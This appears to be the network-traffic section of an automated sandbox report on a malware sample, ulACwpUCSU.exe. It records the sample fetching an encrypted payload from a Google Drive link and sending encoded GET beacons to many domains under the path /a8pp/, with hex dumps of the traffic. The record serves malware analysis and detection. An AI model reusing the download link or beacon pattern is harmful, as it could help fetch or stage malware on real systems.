                                        Location: https://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKi95Qqu%2FS6fpbloQwfATJEkH%2BQDdLyOp7ykGPSi3Lbn5y9LdmNfAOl%2FIaGwR%2BnlNSSlqWUj5dSt2eDf30BxmscuzlTB2asZTLeBn%2FankZ7wmTzfJVhN4iA%2B4%2F2d9p6jO5yi2RIdSqgGdoho"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7ff612fe28dfd-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:41:31.206644058 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        95192.168.11.3049893162.0.237.2280
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:37.239459038 CEST470OUTGET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:37.422058105 CEST548INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:41:37 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        96192.168.11.304989464.190.62.2280
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:42.655119896 CEST472OUTGET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:42.881182909 CEST107INHTTP/1.1 436
                                        date: Tue, 04 Jun 2024 12:41:42 GMT
                                        content-length: 0
                                        server: NginX
                                        connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        97192.168.11.304989523.227.38.7480
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:48.028067112 CEST471OUTGET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:48.203505993 CEST1289INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:41:48 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        X-Storefront-Renderer-Rendered: 1
                                        location: https://www.shootprecious.com/a8pp?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL
                                        x-redirect-reason: https_required
                                        x-frame-options: DENY
                                        content-security-policy: frame-ancestors 'none';
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        vary: Accept
                                        powered-by: Shopify
                                        server-timing: processing;dur=9, db;dur=2, asn;desc="60068", edge;desc="MIA", country;desc="US", pageType;desc="404", servedBy;desc="54zl", requestID;desc="488ad7e1-26c1-4e21-b26e-694e771e0987-1717504908"
                                        x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                        x-request-id: 488ad7e1-26c1-4e21-b26e-694e771e0987-1717504908
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJpIQ0wlQLWiKcb4aphOlkp%2FmV5mMVLWavlvbOXLgllgfIumGNk1LkgS4OvIwnpGPgdfx3NDD8Wf0ypm7GMEsiwhxfuZTLWJ3laI41oT0rBipAppe5jlPxk4z%2BwRHLMgt9k%2FJv%2FfgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","m
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:41:48.203603029 CEST281INData Raw: 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 34 34 2e 30 30 30 31 34 39 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20
                                        Data Ascii: x_age":604800}Server-Timing: cfRequestDuration;dur=44.000149X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 88e7ffcb9c88b3c8
                                        Jun 4, 2024 14:41:48.203670979 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        98192.168.11.3049897217.70.184.5080
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:53.435539007 CEST476OUTGET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:53.649365902 CEST1289INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:41:53 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Vary: Accept-Language
                                        Data Raw: 37 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 63 79 62 65 72 70 73 79 63 68 73 65 63 75 72 69 74 79 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 [TRUNCATED]
                                        Data Ascii: 7bb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>cyberpsychsecurity.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="h [TRUNCATED]
                                        Jun 4, 2024 14:41:53.649462938 CEST886INData Raw: 72 65 73 75 6c 74 73 20 6f 66 20 63 79 62 65 72 70 73 79 63 68 73 65 63 75 72 69 74 79 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74
                                        Data Ascii: results of cyberpsychsecurity.com</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span c
                                        Jun 4, 2024 14:41:53.649477005 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.11.3049792142.250.217.1744433220C:\Users\user\Desktop\ulACwpUCSU.exe
                                        TimestampBytes transferredDirectionData
                                        2024-06-04 12:34:03 UTC216OUTGET /uc?export=download&id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2024-06-04 12:34:03 UTC1582INHTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 04 Jun 2024 12:34:03 GMT
                                        Location: https://drive.usercontent.google.com/download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Content-Security-Policy: script-src 'nonce-5duTGzOW9NDymuTjILo9bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Cross-Origin-Opener-Policy: same-origin
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.11.3049793142.250.217.1934433220C:\Users\user\Desktop\ulACwpUCSU.exe
                                        TimestampBytes transferredDirectionData
                                        2024-06-04 12:34:04 UTC258OUTGET /download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-06-04 12:34:04 UTC4810INHTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="uNvfoz108.bin"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 271424
                                        Last-Modified: Mon, 27 May 2024 09:10:30 GMT
                                        X-GUploader-UploadID: ABPtcPqcq5qbJUHMkq3NSE8IevW-0OPofqh1_PepqbvGJcR0jIustGrNaNo05mu0FvFlUAwDcIkAsz979g
                                        Date: Tue, 04 Jun 2024 12:34:04 GMT
                                        Expires: Tue, 04 Jun 2024 12:34:04 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=MNJtSA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close
                                        2024-06-04 12:34:04 UTC4810INData Raw: aa bf b6 b5 23 5c 26 45 5a 23 ca 69 ed ee fe 4a 72 cf 27 80 23 94 a1 0e ed c3 77 f4 f9 81 7f aa 44 db c5 dc f2 31 7f 78 a6 c9 f4 4a e7 5f f5 09 34 af 09 23 3d 21 0c 51 f1 0e 58 8b b5 61 75 e5 37 88 65 b7 c0 6d 2b e0 54 17 72 48 c3 19 03 06 df 69 1a 87 9a 65 7b 90 d3 7d c8 47 b5 56 c0 95 ef 98 ef ce ff 1a 4f b5 ac 07 b1 e2 06 e1 28 c0 24 6f 6b 69 16 58 46 ea 19 31 5f 45 c9 46 4d 93 c1 a2 15 86 47 b5 33 ad a5 69 a6 02 e6 f7 76 00 a4 3d 48 8d 66 7e ea be 97 4a df d0 8c da 5f 3a ed 52 a1 93 33 f7 d8 5a fd 3f 57 cf aa 24 08 b4 0d ea 34 b3 86 ee 5d 3b d9 3c c6 1f 94 79 e5 1c cf 32 72 fd fb 36 be a8 a3 44 db bf 9f 31 df 26 09 4f 92 4a 5d fb 89 99 2c 8c c4 99 03 2c af e3 e2 88 de 22 85 48 10 96 75 8d c7 f4 9a 94 70 b9 7a 45 1b 1c be 12 25 55 c6 ac 96 fd fb ca ce
                                        Data Ascii: #\&EZ#iJr'#wD1xJ_4#=!QXau7em+TrHie{}GVO($okiXF1_EFMG3iv=Hf~J_:R3Z?W$4];<y2r6D1&OJ],,"HupzE%U
                                        2024-06-04 12:34:04 UTC4810INData Raw: c7 70 ff c2 43 7d 76 17 ec 97 3f c6 94 2a a5 81 ac db 71 e3 8c db 14 65 dc 19 b8 63 2f 8f 10 25 5c 23 5d 92 00 6d 4a bd 65 16 b6 f3 ff 43 8b 29 5a 29 81 a2 20 6b 6f 79 f5 98 90 15 ad bb 2e 5c 74 6b 7b d6 f7 7d a7 7e e8 e5 d0 4a c1 10 c3 5d 15 1a d8 94 32 d2 e4 83 48 f6 37 c9 11 7c 54 a8 3e 11 8d e4 2c 98 da 34 7f 50 20 6a 24 7f d9 52 d8 9e 06 8b a3 54 ab ea 08 e4 4a 28 aa bd 75 5f 17 1c 4b 86 cd 64 e4 5e 7b 63 a6 0d f8 54 47 09 c8 66 f0 0b 13 62 8f f0 1f 7a cc d3 57 12 81 8e 41 19 71 f3 f5 07 c0 82 f7 11 3a 94 f7 fd 77 26 a0 7e 32 ae 0f db fc 1b c7 ba f9 95 12 b0 4d 5c 29 e6 36 f8 ff 5f 00 c8 6e a5 5d 53 e7 80 0b f4 e8 d0 b1 69 78 d9 56 0d dc 55 19 42 2b bc 03 72 ec 92 47 9d 31 76 15 23 6f 3a 47 57 12 2c e0 9e 4d 34 a6 07 58 09 63 51 17 8c 6b 8b ba 48 c7
                                        Data Ascii: pC}v?*qec/%\#]mJeC)Z) koy.\tk{}~J]2H7|T>,4P j$RTJ(u_Kd^{cTGfbzWAq:w&~2M\)6_n]SixVUB+rG1v#o:GW,M4XcQkH
                                        2024-06-04 12:34:05 UTC271INData Raw: ca f1 22 f0 87 8f 0e 37 79 91 f2 8a 34 63 05 0f f5 ef ce 9e 71 ca 3e bc a7 ec 04 0d b3 b8 27 d5 5e b8 e9 fc 47 44 54 79 a2 11 2d 43 1a 48 f7 24 e2 02 1e 2c 9a da 84 6b c0 16 9e be 56 94 14 c2 06 f3 bf 7d 69 06 90 7d 2f 5e 56 91 9a db 59 4a a2 ee eb 4f e9 04 71 50 5c 96 c5 d4 70 ec 97 87 15 01 f1 8d f4 26 84 ca e9 db bf c2 af ab 0f 3e b6 4d bc 9b 69 ef 3a 82 55 49 84 a2 3a 75 3a 1f 75 33 11 29 e0 1d ee 8a 3e 13 a1 9b 8b 37 fd 06 f8 5f 17 fc 47 71 b0 32 f0 a8 7f 80 ef ab 54 2c 9b 43 19 5e 25 2b 86 40 9f 90 7d b1 fd 65 71 0a 43 73 5e e5 2d 21 b9 6c a8 f5 3d 7f a6 ca 04 1e 54 ec 53 0e 81 77 0e fc ef ab 94 e6 64 91 63 8c 16 de 12 91 30 ff ed 30 17 86 00 0f ba f4 e8 3d e5 cf d6 da ae cd fc fe 01 5c e2 7c 5d 74 18 47 73 55 1d d2 b0 ab 35 18 9b d1 0c 46 b5 e0 59
                                        Data Ascii: "7y4cq>'^GDTy-CH$,kV}i}/^VYJOqP\p&>Mi:UI:u:u3)>7_Gq2T,C^%+@}eqCs^-!l=TSwdc00=\|]tGsU5FY
                                        2024-06-04 12:34:05 UTC1255INData Raw: d6 b5 26 9a 06 a7 95 a7 31 46 24 29 12 61 31 63 e7 ad aa 4e 11 d9 a8 bf 46 bc 6d f4 9d 13 a8 4f 79 63 b9 10 8e 47 11 2b ad 90 fd 34 64 6e db f9 98 90 ff f6 14 b3 36 0f 53 51 d8 78 e8 01 69 97 24 c3 24 97 74 7f f7 7b f9 c6 75 1f 6f 4f 3b bc 95 5d 85 8b d7 b1 a2 0a 52 49 70 3f 6f b4 ba be a8 2c a7 f2 55 9a 23 45 80 66 31 0f a8 0d 89 60 f2 3e 22 f5 cd a4 1a 6c 91 fc 90 39 c1 58 12 e5 15 55 d1 a8 41 e9 d4 22 e2 0f 0f da d3 bc 7d 89 56 a9 b9 f0 0b da 23 cd 34 6b 71 99 38 66 f4 9a 7a fd a7 9e 18 f1 31 b7 72 cb e1 1c 1f 33 f2 0a e2 12 79 79 f1 d4 4e 49 44 c4 07 af ae 4e cc 3e 0d 03 ad 62 5e 2d 12 ba ae 95 92 29 26 80 eb ae cc b6 b6 db aa 0a 0e a1 8c d8 a4 8f 89 a6 3d d8 1d 5f 8d d0 bc 72 d0 95 ff 71 eb 18 00 0b 42 1e 60 d0 7c 6b d7 db 54 38 30 38 3e 76 2d 0e 4d
                                        Data Ascii: &1F$)a1cNFmOycG+4dn6SQxi$$t{uoO;]RIp?o,U#Ef1`>"l9XUA"}V#4kq8fz1r3yyNIDN>b^-)&=_rqB`|kT808>v-M
                                        2024-06-04 12:34:05 UTC65INData Raw: 5b 2d 4a 34 8b 64 5b 88 4f ec 85 fd 90 49 63 14 a1 5b 25 d3 1c 8d 9a db 44 f2 5d c5 a8 fd 3c 2a 11 8e 2c 3a 1c 9d 4f ce cb d8 2f 4a 67 db 99 f6 d0 ad 31 47 4f 89 3e fd b2 40 ed e1 9c c1 1d a5 1c
                                        Data Ascii: [-J4d[OIc[%D]<*,:O/Jg1GO>@
                                        2024-06-04 12:34:05 UTC1255INData Raw: 38 86 91 45 a1 b2 45 ab c8 5e 14 6c e9 a1 96 71 e6 c9 61 36 58 99 0d 71 e2 75 48 82 80 2f ca 4f e6 fa 08 93 f5 67 b5 f6 37 5f e9 1a 84 c8 76 89 c6 de 74 ad b5 a7 b2 54 5d 6e ff 18 77 28 9a 48 f1 d8 26 6f d7 31 82 7a 74 a6 cb 0f 8a 5b 81 78 67 7f f1 83 e4 9b 16 47 9a 1b d7 69 11 73 75 b8 87 88 6e 87 24 6e 07 ba db c5 2f 0a f3 fc c2 24 d6 9a 3b 9b 7e 84 79 4f c0 c7 96 3f c5 06 6e f3 c1 1e cf cc 83 72 ef f8 da 34 57 8b c4 fa 09 fe c3 9e 9d ec 3f 8c 68 35 38 f8 8c a2 07 b2 ae f4 71 f0 ea 25 2c 9e ce f2 bf 91 ce 07 fd ea 6c ac 2c c4 7b 85 7b 7f 68 05 cc 9e 0d 99 d5 76 ed 3d 8c 60 f0 4f a3 d2 b4 bb e9 fc 74 af 0a 4b 68 14 fa 7d e5 c3 74 68 a3 0a 3f 22 6d 01 46 32 45 d2 66 0e af 27 40 56 58 c1 41 db 72 ab db 37 2f d3 77 66 9a db 59 c9 c3 4b 0e af 56 9e 48 21 2d
                                        Data Ascii: 8EE^lqa6XquH/Og7_vtT]nw(H&o1zt[xgGisun$n/$;~yO?nr4W?h58q%,l,{{hv=`OtKh}th?"mF2Ef'@VXAr7/wfYKVH!-
                                        2024-06-04 12:34:05 UTC1255INData Raw: 34 dd ec 7b ef ee 6b e3 02 60 85 50 5d 57 60 a8 73 f2 73 04 56 e1 8e 68 b8 92 33 7b 5d c6 ee 36 78 26 ab 4b a3 a1 86 79 2f 15 62 c0 78 88 84 ed 90 43 c1 d6 1f 1e 4c c8 a9 fc 2e 75 d1 29 13 ae 6a 6b 3d ec e9 5f 7f 52 42 f1 05 17 95 fb ee ae 10 6a b6 c8 a6 3c 2e 92 71 cf cc e8 e0 13 ee 47 2f 53 57 a8 aa 3e 32 ce 75 d7 89 c8 4d 93 a8 00 5b 3a 61 fc 72 47 ca 84 9e 4a e8 98 6a cf 00 85 dd e7 ab db 1b 1b de 51 f5 2f 75 7d 10 4a 20 1b 17 c6 c4 66 69 40 f8 91 63 15 97 d4 13 c3 5e 5a 3c a1 03 bc c8 61 3e e7 81 2d 62 35 02 73 c5 fb 65 74 5f c3 5a 6e 61 99 26 fd f4 4a 41 7b fc 71 73 5b 7e f3 11 19 a1 ff 10 7e 46 f4 91 65 25 e8 40 66 44 91 9a d1 33 35 27 be 18 84 f5 30 9d 6f 3c 14 fc 74 56 8f 4d 4b 65 7e d0 ea 31 c4 d6 07 54 91 98 2d 86 d5 3f 4b fe 74 e1 bf d9 76 5c
                                        Data Ascii: 4{k`P]W`ssVh3{]6x&Ky/bxCL.u)jk=_RBj<.qG/SW>2uM[:arGJjQ/u}J fi@c^Z<a>-b5set_Zna&JA{qs[~~Fe%@fD35'0o<tVMKe~1T-?Ktv\
